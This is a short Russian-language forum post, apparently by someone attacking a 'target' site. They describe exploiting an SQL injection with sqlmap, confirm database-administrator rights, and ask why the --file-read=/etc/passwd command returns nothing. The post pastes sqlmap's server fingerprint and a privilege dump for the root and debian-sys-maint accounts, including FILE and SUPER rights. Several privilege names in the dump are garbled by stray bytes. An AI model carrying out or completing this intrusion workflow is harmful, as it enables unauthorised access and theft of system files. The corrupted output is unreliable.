|
Привет, раскурил sql уязвимость у таргета через sqlmap, --privileges есть все, --is-dba: True. Но --file-read=/etc/passwd выполнить не могу, вообще файлы не читает, возвращает ' '.
web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL 5 Вывод privileges: %debian-sys-maint% (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DEP\xc5TE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIH\xf9ER privilege: UPDATE [*] %phpmyadmin% [1]: privilege: USAGE [*] %root% (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: R\xf9FCES privilege: RELOAD privilege: REPLIC\xfdTION SLAVE privilege: REPLICATION CLIENT privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE |
| Время: 04:51 |